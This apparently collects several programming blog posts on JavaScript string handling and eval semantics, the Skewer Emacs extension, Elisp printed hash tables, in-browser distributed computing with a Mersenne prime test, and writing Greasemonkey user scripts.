Notice that, when indexing, it returns a one-character string, not a single character. This is because there’s no character type in JavaScript. It would have been interesting if JavaScript had gone the Elisp route, where there’s no character type but instead characters are represented by integers, with some sort of character literal for using characters in code. This sort of thing can be emulated with the charCodeAt() method.

To work around the strings-are-not-arrays thing, strings can be converted to arrays with split(), manipulated as an array, and restored with join().

foo.split('').reverse().join('')
=> "fedcba"

The string method replace can act as a stand-in for map and filter. The replacement argument can be a function, which will be called on each match. If a single character at a time is selected for replacement then what’s left is the map method.

// Map over each character
foo.replace(/./g, function(c) {
    return String.fromCharCode(c.charCodeAt(0) + 10);
});
=> "klmnop"

For filter, an empty string would be returned in the case of the predicate returning false and the original match in the case of true.

foo.replace(/./g, function(c) {
    if ("xyeczd".indexOf(c) >= 0)
        return c;
    else
        return '';
});
=> "cde"

In most cases, typical use of regular expressions would serve the need for the filter() method, so this is mostly unnecessary. For example, the above could also be done like so,

foo.replace(/[^xyeczd]/g, '');

Another way to fix the missing methods would be to simply implement the Array methods for strings and add them to the String prototype, but that’s generally considered bad practice.

JavaScript's Quirky eval

2012-11-14T00:00:00Z

The infamous eval function is a strange beast in any language, but I think JavaScript’s is perhaps the strangest incarnation. Its very presence in a function foils any possibility of optimization, because it is capable of wreaking so much havoc.

The purpose of eval is to take an arbitrary data structure containing a program (usually a string) and evaluate it. Most of the time the use eval indicates a bad program — its use completely unnecessary, very slow, and probably dangerous. There are exceptions, like Skewer, where a REPL is being provided to a developer. Something needs to perform the “E” part of REPL.

If the language’s platform already has a parser and compiler/interpreter around, like an interpreted language, it’s most of the way to having an eval. eval just exposes the existing functionality directly to programs. In a brute-force, trivial approach, the string to be evaluated could be written to a file and loaded like a regular program.

Semantics

However, executing arbitrary code in an established context is non-trivial. When a program is compiled, the compiler maps out the program’s various lexical bindings at compile time. For example, when compiling C, a function’s variables become offsets from the stack pointer. As an optimization, unused variables can be discarded, saving precious stack space. If the code calling eval has been compiled like this and the evaluation is being done in the same lexical environment as the call, then eval needs to be able to access this mapping in order to map identifiers to bindings.

This complication can be avoided if the eval is explicitly done in the global context. For example, take Common Lisp’s eval.

Evaluates form in the current dynamic environment and the null lexical environment.

This means lexical bindings are not considered, only dynamic (global) bindings. In the expression below, foo is bound lexically so eval has no access to it. The compilation and optimization of this code is unaffected by the eval. It’s about as complicated as loading a new source file with load.

(let ((foo 'bar))
  (eval 'foo))  ; error, foo is unbound

Python and Ruby are similar, where eval is done in the global environment. In both cases, an evaluation environment can be passed explicitly as an additional argument.

In Perl things start to get a bit strange (string version). eval is done in the current lexical environment. ~~However, no assignments, either to change bindings or modify data structures, are visible outside of the eval.~~ (Fixed a string interpolation mistake.)

sub foo {
    my $bar = 10;
    eval '$bar = 5';
    return eval '$bar';
}

This function returns 5. The eval modified the lexically scoped $bar.

Note how short Lisp’s eval documentation is compared to Perl’s. Lisp’s eval semantics are dead simple — very important for such a dangerous function. Perl’s description is two orders of magnitude larger than Lisp’s and it still doesn’t fully document the feature.

JavaScript

JavaScript goes much further than all of this. Not only is eval done in the current lexical environment but it can introduce entirely new bindings!

function foo() {
    eval('var bar = 10');
    return bar;
}

This function returns 10. eval created a new lexical variable in foo at run time. Because the environment can be manipulated so drastically at run time, any hopes of effectively compiling foo are thrown out the window. To have an outside function modify the local environment is a severe side-effect. It essentially requires that JavaScript be interpreted rather than compiled. Along with the with statement, it’s strong evidence that JavaScript was at some point designed by novices.

eval also makes closures a lot heavier. Normally the compiler can determine at compile time which variables are being accessed by a function and minimize the environment captured by a closure. For example,

function foo(x) {
    var y = {x: x};
    return function() {
        return x * x;
    };
}

The function foo returns a closure capturing the bindings x and y. The compiler can prove that y is never accessed by the closure and omit it, freeing the object bound to y for garbage collection. However, if eval is present, anything could be accessed at any time and the compiler can prove nothing. For example,

function foo(x) {
    return function() {
        return eval('x * x');
    };
}

The variable x is never accessed lexically, but the eval can tease it out at run time. The expression foo(3)() will evaluate to 9, showing that anything exposed to the closure is not free to be garbage collected as long as the closure is accessible.

If that’s where the story ended, JavaScript optimization would look pretty bleak. Any function call could be a call to eval and so any time we call another function it may stomp all over the local environment, preventing the compiler from proving anything useful. For example,

var secretEval = eval;
function foo(string) {
    // ...
    secretEval(string);
    // ...
}

There’s good news and bad news. The good news is that this is not the case in the above example. string will be evaluated in the global environment, not the local environment. The bad news is that this is because of a obscure, complicated concept of indirect and direct evals.

In general, when eval is called by a name other than “eval” it is an indirect call and is performed in the global environment (see the linked article for a more exact description). This means the compiler can tell at compile time whether or not eval will be evaluating in the lexical environment. If not, it’s free to make optimizations that eval would otherwise prohibit. Whew!

Strict mode

To address eval’s problems a bit further, along with some other problems, ECMAScript 5 introduced strict mode. Strict mode modifies JavaScript’s semantics so that it’s a more robust and compiler-friendly language.

In strict mode, eval still uses the local environment when called directly but it gets its own nested environment. New bindings are created in this nested environment, which is discarded when evaluation is complete. JavaScript’s eval is still quirky, but less so than before.

Skewer: Emacs Live Browser Interaction

2012-10-31T00:00:00Z

Inspired by Emacs Rocks! Episode 11 on swank-js, I spent the last week writing a new extension to Emacs to improve support for web development. It’s called Skewer and it allows you to interact with a browser like you would an inferior Lisp process. It’s written in pure Emacs Lisp, operates as a servlet for my Elisp webserver, and requires no special support from your browser or any other external programs, making it portable and very easy to set up.

Repository

Available on MELPA
https://github.com/skeeto/skewer-mode

Demo

(No audio.)

YouTube video

The video also on YouTube.

It works a little bit like impatient-mode. First, the browser makes a long poll to Emacs. When you’re ready to send code to the browser to evaluate, Emacs wraps the expression in a bit of JSON and sends it to the browser. The browser responds with the result and starts another long poll.

As such, the browser doesn’t need to do anything special to support Skewer. If it can run jQuery, it can be skewered. I’ve tested it and found it working successfully on the latest versions of all the major browsers, including you-know-who.

To properly grab expressions around/before the point I’m using the amazing js2-mode, originally written by the famous Steve Yegge. If you’re developing JavaScript you should be using this mode anyway! I thought I was clever with my psl-mode, writing my own full language parser. Steve Yegge did the same thing on a much larger scale three years ago with js2-mode. It includes an entire JavaScript 1.8 parser so the mode has full semantic understanding of the language. For Skewer, I use js2-mode’s functions to access the AST and extract complete, valid expressions.

What’s wrong with swank-js?

Skewer provides nearly the same functionality as swank-js, a JavaScript back-end to SLIME. At a glance my extension seems redundant.

The problem with swank-js is the complicated setup. It requires a cooperating Node.js server, a particular version of SLIME, and a lot of patience. I could never get it working, and if I did I wouldn’t want to have to do all that setup again on another computer. In contrast, Skewer is just another Emacs package, no special setup needed. Thanks to package.el installing and using it should be no more difficult than installing any other package.

Most importantly, with Skewer I can capture the setup in my .emacs.d repository where it will automatically work across any operating system, so long as it has Emacs installed.

Getting into JavaScript

I already used Skewer to develop a little boids toy, which I’m using to demonstrate the mode (the video). Unlike my previous experiences in web development, this was extremely enjoyable — probably because it felt a lot like I was writing Lisp. And unlike any Lisp I’ve used so far, I had a canvas to draw on with my live code. That’s a satisfying tool to have.

Due to those prior poor experiences, I had avoided web development for a long time. But now that I have some decent tools configured I’m going to get into it more. In fact, I’ve decided I’m completely done with writing Java applets. Bounze will have been my last one.

This has become a pattern for me. When I want to start using a new language or platform I need to figure out a work-flow with Emacs. This involves trying out new modes, reading about how other people do it, and, ultimately, when I found out the existing stuff is inadequate I build my own extensions to create the work-flow I desire. I did this with Java, recently with psl-mode (which was to be expected), and now web development.

In my recent proper introduction JavaScript in order to create and demo Skewer mode idiomatically, perhaps the most exciting discovery this past week was the JavaScript community itself. I’ve been mostly unaware of this community and taking my first steps into it has been enlightening.

JavaScript had a rough start. It was designed in a rush by developers who, at the time, didn’t quite understand the consequences of their design decisions, and later extended by similar people. The name of the language itself is evidence of this. Fortunately some really smart people jumped on board along the way (including Guy Steele of Lisp fame) and have tried to undo, or at least mitigate, the mistakes.

Due to the coarseness of the language, the JavaScript community is actually a lot like the Elisp community, but on a larger scale: there’s still a whole lot of frontier to explore and it’s pretty easy to make a noticeable splash.

Here’s to splashing!

Elisp Printed Hash Tables

2010-06-07T00:00:00Z

A printed hash table representation is pretty new to Elisp, and a bit late. As far as I know Elisp didn't come with a way to print, and read back in, a hash table without rolling your own (like Jared Dilettante was doing with a Data::Dumper style output), until 23.1 in July 2009. This is when json.el was first included with Emacs, for dumping to and reading from JSON.

(require 'json)

(setq hash (make-hash-table))
(puthash "key1" "data1" hash)
(puthash "key2" "data2" hash)

(insert "\n;; " (json-encode hash))
;; {"key2":"data2", "key1":"data1"}

Just a month ago Emacs 23.2 came out, very silently including a new printed representation for hash tables with a #s hash notation.

#s(hash-table data ("key1" "data1" "key2" "data2"))

With this hash tables can be printed and read as part of normal s-expressions with the standard lisp reader and printer functions. It seems heavy, having to write out "hash-table" in there, but I think it's because the #s notation will be used to create printed forms of other lisp objects that currently do not have one.

JavaScript Distributed Computing

2009-06-09T00:00:00Z

I'm not the first to come across this idea: the browser could be used as part of a distributed computing system. A web server hands out JavaScript and the browser runs the script and reports the results back to the server. The browser is a portable, widely available platform so just about anyone can easily contribute, possibly without even knowing.

Browsers aren't really expecting this sort of thing. They will complain if a script is running for too long. If you tell Firefox to continue running the script anyway, it will lock up until the script is done (or when it complains again). This can be worked around by writing a simple scheduler with setTimeout().

This could also potentially be used as an alternative to advertising. Instead of selling advertising space, a website operator could sell visitor's CPU time by including a little snippet of code. This may be more successful, because most visitors would be unaware of it, making it less intrusive. It will be less likely to be blocked. Of course, there ethical issues about this. In fact, there is already a company doing this with secret Java applets.

There are two serious constraints on using JavaScript in a browser as a distributed computing platform:

Low bandwidth. There isn't a lot of opportunity to transfer data between the server and the node, and nodes can't talk to each other. The data needed by a node must be small. The results data must also be small.

Short computational units. The JavaScript in the browser has no way to store its running state between browser sessions, so it must rely on the server for this. This means that the units of work must be able to be completed within a short period of time. A few minutes at the most on a normal computer.

A lot of problems won't fit inside these limitations. One that I thought might was a Mersenne prime search. A Mersenne prime is a prime of the form,

2ⁿ - 1

So even though the largest known Mersenne prime has nearly 13 million digits (about 5 MB just to store the entire number), it can be described by it's exponent, 43,112,609, which is small enough to fit in a 4-byte integer. The result of a calculation, a probabilistic primality test, is a "yes" or "no". One bit. It fits the first constraint very well.

However, the smallest amount of work a node can do is an entire primality test. If we break it down any further, the prime will have been expanded and we will not fit the first constraint. There will be too much data. To see how possible it might be, I implemented it, which you can try out here,

/download/mersenne/ (sloppy code warning!)

I modified an existing JavaScript bigint library which allowed me to get it up running quickly. After you receive the page, your browser will run the Miller-Rabin primality test on 2^9941 - 1. You can edit the source HTML to try a different exponent. Running it on several of my computers on different browsers it took anywhere from an hour to 8 hours. And that's only with an exponent of 9941. It's an unsuitable problem.

It would be neat to see a browser computing grid in action, but I can't think of a problem to solve with it.

Greasemonkey User Scripts

2009-05-05T00:00:00Z

I have recently been playing around with Greasemonkey, a great Firefox add-on that gives users a lot of control over how a website is displayed. It works by having the user providing a bit of Javascript that runs when a website is rendered. The user doesn't actually have to write the script, but can find them in various script repositories.

When I looked around, I couldn't find scripts to do some things I wanted, so I started writing my own. Now that I have started that habit I see uses for user scripts all over the place. Suddenly I can fix anything I find annoying on the web. It's very empowering.

Of course, Firefox add-ons can do anything a user script can do. But Greasemonkey user scripts are lightweight, more secure (due to being less powerful), easier to write, and don't require a browser restart to install and uninstall.

I posted my scripts on userscripts.org so that people could find them easily, but I always like to host these things locally, too. ~~You can find it under /userscripts here.~~ Don't forget to review the source before you install it! That is, unless you automatically trust me and my website's security. I, or an infiltrator, could slip something sneaky in there.

I actually first used Greasemonkey back in 2005, but they had some very serious security issues back in those days. It was bad enough that I just uninstalled it, which was actually recommended by the Greasemonkey people themselves. So, four years later I am back to check it out.

The first user script I wrote was in response to a "feature" on TV Tropes. In addition to the overall cruddiness of the website, they started adding "folders" to the information on long pages. It folds up all of the information behind little clickable widgets. It uses CSS to hide the information and Javascript to reveal it by adjusting those styles on the fly. If you have a browser with CSS support but not Javascript (or have it disabled like I did), you won't ever be able to see the information in the browser. As of this writing the Jumping the Shark article uses this. Take a look.

This is an awful idea! It critically breaks the usability of the page. And what's the point? We already have a vertical scrollbar to control the display. Unfortunately, a lot of clueless people seem to like this sort of behavior — because it's flashy — so we will probably only see more of it on the web in the future.

My TV Tropes user script is simple: it scrapes off some of the CSS. Specifically, the "folder" CSS. That's it! Someone who already knows how to make user scripts could probably put this together in less than 15 minutes.

If you want to tackle web annoyances, learn Greasemonkey!